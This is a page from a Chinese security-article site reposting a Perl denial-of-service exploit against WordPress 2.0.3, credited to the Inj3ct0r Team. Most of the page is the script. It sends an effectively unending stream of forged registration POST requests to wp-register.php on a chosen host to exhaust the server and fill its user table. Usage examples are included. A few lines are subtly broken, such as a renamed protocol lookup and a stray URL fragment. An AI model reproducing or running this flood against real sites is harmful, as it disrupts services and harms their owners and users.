WordPress 2.0.3 Denial of Service Exploits

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

WordPress 2.0.3 Denial of Service Exploits

来源：Angel-Injection@hotmail.com 作者：Angel 发布时间：2011-10-17

#!/usr/bin/perl
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
#
# Exploit Title: WordPress 2.0.3 Denial of Service Exploits
# Author: Angel Injection
# Home: http://1337day.com
# Thanks To: All Members Inj3ct0r Team
#
#########################################################################
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; http://
for ($i=0; $i<100000000000000000000000000000000000000000000000000000000000000000000000000000000000000; $i++)
{
$user="\x41\x42\x43\x44\x45\x46\x47\x48\x49\x50\x51\x52\x53\x54\x56\x56\x57\x58\x59".$rand.$i;
$data = "action=register&user_login=$user&user_email=$user\@inj3ct0r&submit=Register+%C2%BB";
$len = length $data;
$angel = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
               "Accept: */*\r\n".
               "Accept-Language: en-gb\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Accept-Encoding: gzip, deflate\r\n".
               "User-Agent: Mozilla/5.0 Linux Inj3ct0r 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux)\r\n".
               "Host: $host\r\n".
               "Content-Length: $len\r\n".
               "Connection: Keep-Alive\r\n".
               "Cache-Control: no-cache\r\n\r\n".
 "$data";
     my $port = "80";
     my $inj3ct0r = getinj3ct0r('tcp');
     socket(SOCKET, PF_INET, SOCK_STREAM, $inj3ct0r);
     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
     send(SOCKET,"$angel", 0);
     syswrite STDOUT, "+";
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 192.168.1.1 /wp/\n";
print "\tex2: $0 192.168.1.1 /\n";
exit();
};

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告